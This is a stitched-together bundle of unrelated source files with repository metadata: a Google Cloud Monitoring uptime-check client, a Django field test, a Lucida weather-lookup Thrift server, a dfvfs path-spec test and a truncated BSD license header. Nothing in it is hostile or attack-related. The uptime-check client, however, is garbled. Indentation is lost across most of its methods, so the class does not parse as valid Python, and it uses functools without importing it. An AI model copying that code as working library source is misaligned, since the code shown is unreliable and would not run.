import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
import grpc
from google.api import metric_pb2 as api_metric_pb2
from google.api import monitored_resource_pb2
from google.cloud.monitoring_v3.gapic import enums
from google.cloud.monitoring_v3.gapic import uptime_check_service_client_config
from google.cloud.monitoring_v3.gapic.transports import (
uptime_check_service_grpc_transport,
)
from google.cloud.monitoring_v3.proto import alert_pb2
from google.cloud.monitoring_v3.proto import alert_service_pb2
from google.cloud.monitoring_v3.proto import alert_service_pb2_grpc
from google.cloud.monitoring_v3.proto import common_pb2
from google.cloud.monitoring_v3.proto import group_pb2
from google.cloud.monitoring_v3.proto import group_service_pb2
from google.cloud.monitoring_v3.proto import group_service_pb2_grpc
from google.cloud.monitoring_v3.proto import metric_pb2 as proto_metric_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2_grpc
from google.cloud.monitoring_v3.proto import notification_pb2
from google.cloud.monitoring_v3.proto import notification_service_pb2
from google.cloud.monitoring_v3.proto import notification_service_pb2_grpc
from google.cloud.monitoring_v3.proto import service_pb2
from google.cloud.monitoring_v3.proto import service_service_pb2
from google.cloud.monitoring_v3.proto import service_service_pb2_grpc
from google.cloud.monitoring_v3.proto import uptime_pb2
from google.cloud.monitoring_v3.proto import uptime_service_pb2
from google.cloud.monitoring_v3.proto import uptime_service_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
from google.protobuf import timestamp_pb2
# Installed version of this client library; reported to the service in the
# user-agent of every API request (see ClientInfo usage in __init__).
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
    "google-cloud-monitoring",
).version
class UptimeCheckServiceClient(object):
"""
The UptimeCheckService API is used to manage (list, create, delete,
edit) Uptime check configurations in the Stackdriver Monitoring product.
An Uptime check is a piece of configuration that determines which
resources and services to monitor for availability. These configurations
can also be configured interactively by navigating to the [Cloud
Console] (http://console.cloud.google.com), selecting the appropriate
project, clicking on "Monitoring" on the left-hand side to navigate to
Stackdriver, and then clicking on "Uptime".
"""
SERVICE_ADDRESS = "monitoring.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.monitoring.v3.UptimeCheckService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UptimeCheckServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def project_path(cls, project):
"""DEPRECATED. Return a fully-qualified project string."""
warnings.warn(
"Resource name helper functions are deprecated.",
PendingDeprecationWarning,
stacklevel=1,
)
return google.api_core.path_template.expand(
"projects/{project}", project=project,
)
@classmethod
def uptime_check_config_path(cls, project, uptime_check_config):
"""DEPRECATED. Return a fully-qualified uptime_check_config string."""
warnings.warn(
"Resource name helper functions are deprecated.",
PendingDeprecationWarning,
stacklevel=1,
)
return google.api_core.path_template.expand(
"projects/{project}/uptimeCheckConfigs/{uptime_check_config}",
project=project,
uptime_check_config=uptime_check_config,
)
    def __init__(
        self,
        transport=None,
        channel=None,
        credentials=None,
        client_config=None,
        client_info=None,
        client_options=None,
    ):
        """Constructor.

        Args:
            transport (Union[~.UptimeCheckServiceGrpcTransport,
                    Callable[[~.Credentials, type], ~.UptimeCheckServiceGrpcTransport]): A transport
                instance, responsible for actually making the API calls.
                The default transport uses the gRPC protocol.
                This argument may also be a callable which returns a
                transport instance. Callables will be sent the credentials
                as the first argument and the default transport class as
                the second argument.
            channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
                through which to make calls. This argument is mutually exclusive
                with ``credentials``; providing both will raise an exception.
            credentials (google.auth.credentials.Credentials): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is mutually exclusive with providing a
                transport instance to ``transport``; doing so will raise
                an exception.
            client_config (dict): DEPRECATED. A dictionary of call options for
                each method. If not specified, the default configuration is used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            client_options (Union[dict, google.api_core.client_options.ClientOptions]):
                Client options used to set user options on the client. API Endpoint
                should be set through client_options.
        """
        # Raise deprecation warnings for things we want to go away.
        if client_config is not None:
            warnings.warn(
                "The `client_config` argument is deprecated.",
                PendingDeprecationWarning,
                stacklevel=2,
            )
        else:
            client_config = uptime_check_service_client_config.config
        if channel:
            warnings.warn(
                "The `channel` argument is deprecated; use " "`transport` instead.",
                PendingDeprecationWarning,
                stacklevel=2,
            )
        # A client_options.api_endpoint overrides the default service address.
        api_endpoint = self.SERVICE_ADDRESS
        if client_options:
            if type(client_options) == dict:
                client_options = google.api_core.client_options.from_dict(
                    client_options
                )
            if client_options.api_endpoint:
                api_endpoint = client_options.api_endpoint
        # Instantiate the transport.
        # The transport is responsible for handling serialization and
        # deserialization and actually sending data to the service.
        if transport:
            if callable(transport):
                # Transport factory: it receives the credentials and the
                # default transport class and must return an instance.
                self.transport = transport(
                    credentials=credentials,
                    default_class=uptime_check_service_grpc_transport.UptimeCheckServiceGrpcTransport,
                    address=api_endpoint,
                )
            else:
                if credentials:
                    raise ValueError(
                        "Received both a transport instance and "
                        "credentials; these are mutually exclusive."
                    )
                self.transport = transport
        else:
            self.transport = uptime_check_service_grpc_transport.UptimeCheckServiceGrpcTransport(
                address=api_endpoint, channel=channel, credentials=credentials,
            )
        if client_info is None:
            client_info = google.api_core.gapic_v1.client_info.ClientInfo(
                gapic_version=_GAPIC_LIBRARY_VERSION,
            )
        else:
            client_info.gapic_version = _GAPIC_LIBRARY_VERSION
        self._client_info = client_info
        # Parse out the default settings for retry and timeout for each RPC
        # from the client configuration.
        # (Ordinarily, these are the defaults specified in the `*_config.py`
        # file next to this one.)
        self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
            client_config["interfaces"][self._INTERFACE_NAME],
        )
        # Save a dictionary of cached API call functions.
        # These are the actual callables which invoke the proper
        # transport methods, wrapped with `wrap_method` to add retry,
        # timeout, and the like.
        self._inner_api_calls = {}
# Service calls
def list_uptime_check_configs(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists the existing valid Uptime check configurations for the project
(leaving out any invalid configurations).
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # Iterate over all results
>>> for element in client.list_uptime_check_configs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_uptime_check_configs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): The project whose Uptime check configurations are listed. The format is
``projects/[PROJECT_ID]``.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "list_uptime_check_configs" not in self._inner_api_calls:
self._inner_api_calls[
"list_uptime_check_configs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_uptime_check_configs,
default_retry=self._method_configs["ListUptimeCheckConfigs"].retry,
default_timeout=self._method_configs["ListUptimeCheckConfigs"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.ListUptimeCheckConfigsRequest(
parent=parent, page_size=page_size,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_uptime_check_configs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="uptime_check_configs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def get_uptime_check_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a single Uptime check configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> name = client.uptime_check_config_path('[PROJECT]', '[UPTIME_CHECK_CONFIG]')
>>>
>>> response = client.get_uptime_check_config(name)
Args:
name (str): The Uptime check configuration to retrieve. The format is
``projects/[PROJECT_ID]/uptimeCheckConfigs/[UPTIME_CHECK_ID]``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "get_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"get_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_uptime_check_config,
default_retry=self._method_configs["GetUptimeCheckConfig"].retry,
default_timeout=self._method_configs["GetUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.GetUptimeCheckConfigRequest(name=name,)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def create_uptime_check_config(
self,
parent,
uptime_check_config,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a new Uptime check configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # TODO: Initialize `uptime_check_config`:
>>> uptime_check_config = {}
>>>
>>> response = client.create_uptime_check_config(parent, uptime_check_config)
Args:
parent (str): The project in which to create the Uptime check. The format is
``projects/[PROJECT_ID]``.
uptime_check_config (Union[dict, ~google.cloud.monitoring_v3.types.UptimeCheckConfig]): The new Uptime check configuration.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "create_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"create_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_uptime_check_config,
default_retry=self._method_configs["CreateUptimeCheckConfig"].retry,
default_timeout=self._method_configs["CreateUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.CreateUptimeCheckConfigRequest(
parent=parent, uptime_check_config=uptime_check_config,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["create_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def update_uptime_check_config(
self,
uptime_check_config,
update_mask=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Updates an Uptime check configuration. You can either replace the entire
configuration with a new one or replace only certain fields in the
current configuration by specifying the fields to be updated via
``updateMask``. Returns the updated configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> # TODO: Initialize `uptime_check_config`:
>>> uptime_check_config = {}
>>>
>>> response = client.update_uptime_check_config(uptime_check_config)
Args:
uptime_check_config (Union[dict, ~google.cloud.monitoring_v3.types.UptimeCheckConfig]): Required. If an ``updateMask`` has been specified, this field gives the
values for the set of fields mentioned in the ``updateMask``. If an
``updateMask`` has not been given, this Uptime check configuration
replaces the current configuration. If a field is mentioned in
``updateMask`` but the corresonding field is omitted in this partial
Uptime check configuration, it has the effect of deleting/clearing the
field from the configuration on the server.
The following fields can be updated: ``display_name``, ``http_check``,
``tcp_check``, ``timeout``, ``content_matchers``, and
``selected_regions``.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig`
update_mask (Union[dict, ~google.cloud.monitoring_v3.types.FieldMask]): Optional. If present, only the listed fields in the current Uptime check
configuration are updated with values from the new configuration. If this
field is empty, then the current configuration is completely replaced with
the new configuration.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "update_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"update_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_uptime_check_config,
default_retry=self._method_configs["UpdateUptimeCheckConfig"].retry,
default_timeout=self._method_configs["UpdateUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.UpdateUptimeCheckConfigRequest(
uptime_check_config=uptime_check_config, update_mask=update_mask,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("uptime_check_config.name", uptime_check_config.name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["update_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def delete_uptime_check_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes an Uptime check configuration. Note that this method will fail
if the Uptime check configuration is referenced by an alert policy or
other dependent configs that would be rendered invalid by the deletion.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> name = client.uptime_check_config_path('[PROJECT]', '[UPTIME_CHECK_CONFIG]')
>>>
>>> client.delete_uptime_check_config(name)
Args:
name (str): The Uptime check configuration to delete. The format is
``projects/[PROJECT_ID]/uptimeCheckConfigs/[UPTIME_CHECK_ID]``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "delete_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"delete_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_uptime_check_config,
default_retry=self._method_configs["DeleteUptimeCheckConfig"].retry,
default_timeout=self._method_configs["DeleteUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.DeleteUptimeCheckConfigRequest(name=name,)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
self._inner_api_calls["delete_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
    def list_uptime_check_ips(
        self,
        page_size=None,
        retry=google.api_core.gapic_v1.method.DEFAULT,
        timeout=google.api_core.gapic_v1.method.DEFAULT,
        metadata=None,
    ):
        """
        Returns the list of IP addresses that checkers run from

        Example:
            >>> from google.cloud import monitoring_v3
            >>>
            >>> client = monitoring_v3.UptimeCheckServiceClient()
            >>>
            >>> # Iterate over all results
            >>> for element in client.list_uptime_check_ips():
            ...     # process element
            ...     pass
            >>>
            >>> # Alternatively, iterate over results one page at a time
            >>> for page in client.list_uptime_check_ips().pages:
            ...     for element in page:
            ...         # process element
            ...         pass

        Args:
            page_size (int): The maximum number of resources contained in the
                underlying API response. If page streaming is performed per-
                resource, this parameter does not affect the return value. If page
                streaming is performed per-page, this determines the maximum number
                of resources in a page.
            retry (Optional[google.api_core.retry.Retry]): A retry object used
                to retry requests. If ``None`` is specified, requests will
                be retried using a default configuration.
            timeout (Optional[float]): The amount of time, in seconds, to wait
                for the request to complete. Note that if ``retry`` is
                specified, the timeout applies to each individual attempt.
            metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
                that is provided to the method.

        Returns:
            A :class:`~google.api_core.page_iterator.PageIterator` instance.
            An iterable of :class:`~google.cloud.monitoring_v3.types.UptimeCheckIp` instances.
            You can also iterate over the pages of the response
            using its `pages` property.

        Raises:
            google.api_core.exceptions.GoogleAPICallError: If the request
                failed for any reason.
            google.api_core.exceptions.RetryError: If the request failed due
                to a retryable error and retry attempts failed.
            ValueError: If the parameters are invalid.
        """
        # Copy caller metadata so routing entries never mutate the input.
        if metadata is None:
            metadata = []
        metadata = list(metadata)
        # Wrap the transport method to add retry and timeout logic.
        if "list_uptime_check_ips" not in self._inner_api_calls:
            self._inner_api_calls[
                "list_uptime_check_ips"
            ] = google.api_core.gapic_v1.method.wrap_method(
                self.transport.list_uptime_check_ips,
                default_retry=self._method_configs["ListUptimeCheckIps"].retry,
                default_timeout=self._method_configs["ListUptimeCheckIps"].timeout,
                client_info=self._client_info,
            )
        # No routing header here: this RPC has no resource-name parameter.
        request = uptime_service_pb2.ListUptimeCheckIpsRequest(page_size=page_size,)
        # Lazily pages through results; no RPC happens until iteration begins.
        iterator = google.api_core.page_iterator.GRPCIterator(
            client=None,
            method=functools.partial(
                self._inner_api_calls["list_uptime_check_ips"],
                retry=retry,
                timeout=timeout,
                metadata=metadata,
            ),
            request=request,
            items_field="uptime_check_ips",
            request_token_field="page_token",
            response_token_field="next_page_token",
        )
        return iterator
| {
"content_hash": "effd5cf611d0c10e4d13a5d518cc8c96",
"timestamp": "",
"source": "github",
"line_count": 752,
"max_line_length": 171,
"avg_line_length": 43.89627659574468,
"alnum_prop": 0.6078461072402302,
"repo_name": "tswast/google-cloud-python",
"id": "d9dd41a0b5c54488bd22a299163f3a9dce85d159",
"size": "33612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monitoring/google/cloud/monitoring_v3/gapic/uptime_check_service_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
import unittest
import defaulting
from random import random
from django.dispatch import dispatcher
class emptyo(object):
    """Attribute bag: an empty object that exists only to hold assigned attributes."""
    pass
class TestDefaulting(unittest.TestCase):
    """Test DefaultingCharField construction and internal type reporting."""
    def setUp(self):
        """Create a few DefaultingCharFields and a stand-in _meta object."""
        self.dcfValue = random()
        self.dcf = defaulting.DefaultingCharField(self.dcfValue)
        self.dcf2 = defaulting.DefaultingCharField()
        # Fake the Django model _meta machinery so the fields can be attached
        # without a real model class.
        self.__class__._meta = emptyo()
        def add_field(f):
            # no-op stand-in for Options.add_field
            pass
        self.__class__._meta.add_field = add_field
        self.__class__._meta.module_name = "testaudit"
        self.__class__._meta.object_name = "TestUpdatedByField"
    def testInit(self):
        """The first positional argument becomes default_from_field; omitted means None."""
        self.assertEqual(self.dcfValue, self.dcf.default_from_field)
        # assertIsNone/assertIsInstance replace the deprecated assert_ alias,
        # which was removed in Python 3.12.
        self.assertIsNone(self.dcf2.default_from_field)
        self.assertIsInstance(self.dcf, defaulting.DefaultingCharField)
    def testInternalType(self):
        """The field reports itself to Django as a plain CharField."""
        self.assertEqual("CharField", self.dcf.get_internal_type())
# Build the suite explicitly so external runners can import and reuse it.
suite = unittest.TestLoader().loadTestsFromTestCase(TestDefaulting)
if __name__ == '__main__':
    unittest.main()
| {
"content_hash": "75501db394f417dac632df6ae50b47d0",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 74,
"avg_line_length": 27.976744186046513,
"alnum_prop": 0.6550290939318371,
"repo_name": "hudora/huDjango",
"id": "7d9b3854809b296cbcc318f13dfbce5c76d769c0",
"size": "1251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hudjango/fields/testdefaulting.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "102049"
}
],
"symlink_target": ""
} |
import sys
sys.path.append('../')
from WeatherConfig import*
from lucidatypes.ttypes import QuerySpec
from lucidaservice import LucidaService
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import json
import urllib
class WeatherHandler(LucidaService.Iface):
    # Thrift service handler: only infer() does real work; create/learn are
    # required by the LucidaService interface but are no-ops here.
    def create(self, LUCID, spec):
        """
        Do nothing
        """
        return
    def learn(self, LUCID, knowledge):
        """
        Do nothing
        """
        return
    def infer(self, LUCID, query):
        """
        Determine the weather based off input
        Parameters:
         - LUCID: ID of Lucida user
         - query: query

        Tries Weather Underground first; on error or missing observation,
        falls back to Open Weather Map. Returns a human-readable string.
        """
        # NOTE(review): assumes the location text is the last data item of the
        # first content entry — confirm against the Lucida query schema.
        input_data = query.content[0].data[-1]
        result = 'No weather found for %s' % input_data
        url_location = urllib.quote_plus(input_data)
        # weather from Weather Underground
        try:
            f = urllib.urlopen(WU_API_URL_BASE + \
                '%s/conditions/q/%s.json' % (WU_API_KEY, url_location))
            json_string = f.read()
            parsed_json = json.loads(json_string)
            if 'error' not in parsed_json['response'] \
            and 'current_observation' in parsed_json:
                weather = parsed_json['current_observation']['weather']
                temp = parsed_json['current_observation']['temperature_string']
                city = parsed_json['current_observation']['display_location']['full']
                result = "Current weather in %s is %s %s" % (city, weather, temp)
                print 'From Weather Underground: %s' % result
            else:
                # weather from Open Weather Map
                f = urllib.urlopen(OWM_API_URL_BASE + \
                    'q=%s&appid=%s&units=imperial&type=like' % (url_location, OWM_API_KEY))
                json_string = f.read()
                parsed_json = json.loads(json_string)
                if 'weather' in parsed_json and 'main' in parsed_json and 'name' in parsed_json:
                    weather = parsed_json['weather'][0]['main']
                    temp = parsed_json['main']['temp']
                    city = parsed_json['name']
                    # Only trust the OWM result if the returned city name
                    # actually appears in the user's input.
                    if city in input_data:
                        result = 'Current weather in %s is %s, %s F' % (city, weather, temp)
                        print 'From Open Weather Map: %s' % result
            f.close()
        except IOError as err:
            # NOTE(review): '401 in err' relies on Python 2 exceptions being
            # iterable over their args — verify this matches urllib's IOError shape.
            if 401 in err:
                result = 'Unauthorized Weather API keys'
            else:
                result = 'Weather Service is broken!'
        return result
# Set handler to our implementation
handler = WeatherHandler()
processor = LucidaService.Processor(handler)
# Framed transport + binary protocol: must match the Lucida client settings.
transport = TSocket.TServerSocket(port=PORT)
tfactory = TTransport.TFramedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
# TSimpleServer handles one connection at a time; this call blocks forever.
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print 'WE at port %d' % PORT
server.serve()
| {
"content_hash": "2b718d530bcc86216ea6c07abae31a0c",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 96,
"avg_line_length": 35.89411764705882,
"alnum_prop": 0.5811209439528023,
"repo_name": "claritylab/sirius",
"id": "8ae390520eaf6f16a7cdbb742015196cdd651094",
"size": "3074",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lucida/weather/server/WeatherServer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "1151"
},
{
"name": "Batchfile",
"bytes": "777"
},
{
"name": "C",
"bytes": "11598"
},
{
"name": "C++",
"bytes": "367354"
},
{
"name": "Cuda",
"bytes": "30380"
},
{
"name": "Java",
"bytes": "1175055"
},
{
"name": "JavaScript",
"bytes": "1356"
},
{
"name": "Makefile",
"bytes": "24290"
},
{
"name": "PHP",
"bytes": "531"
},
{
"name": "Pascal",
"bytes": "87"
},
{
"name": "Protocol Buffer",
"bytes": "1501"
},
{
"name": "Python",
"bytes": "19987"
},
{
"name": "Shell",
"bytes": "19289"
},
{
"name": "Thrift",
"bytes": "4220"
}
],
"symlink_target": ""
} |
"""Tests for the PHDI image path specification implementation."""
import unittest
from dfvfs.path import phdi_path_spec
from tests.path import test_lib
class PHDIPathSpecTest(test_lib.PathSpecTestCase):
  """Tests the PHDI image path specification implementation."""

  def testInitialize(self):
    """Tests the path specification initialization."""
    spec = phdi_path_spec.PHDIPathSpec(parent=self._path_spec)
    self.assertIsNotNone(spec)

    # A parent path specification is mandatory.
    with self.assertRaises(ValueError):
      phdi_path_spec.PHDIPathSpec(parent=None)

    # Unsupported keyword arguments are rejected.
    with self.assertRaises(ValueError):
      phdi_path_spec.PHDIPathSpec(parent=self._path_spec, bogus='BOGUS')

  def testComparable(self):
    """Tests the path specification comparable property."""
    spec = phdi_path_spec.PHDIPathSpec(parent=self._path_spec)
    self.assertIsNotNone(spec)

    self.assertEqual(spec.comparable, 'type: TEST\ntype: PHDI\n')
# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()
| {
"content_hash": "06e287754aed14eeeab120fd78bcf299",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 72,
"avg_line_length": 26.725,
"alnum_prop": 0.7043966323666978,
"repo_name": "joachimmetz/dfvfs",
"id": "01e90c17ca57b2e290a5660aa90f420664991ef1",
"size": "1115",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/path/phdi_path_spec.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
} |
# BSD 3-Clause License
# =======
# Copyright (c) 2020, Xilinx
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
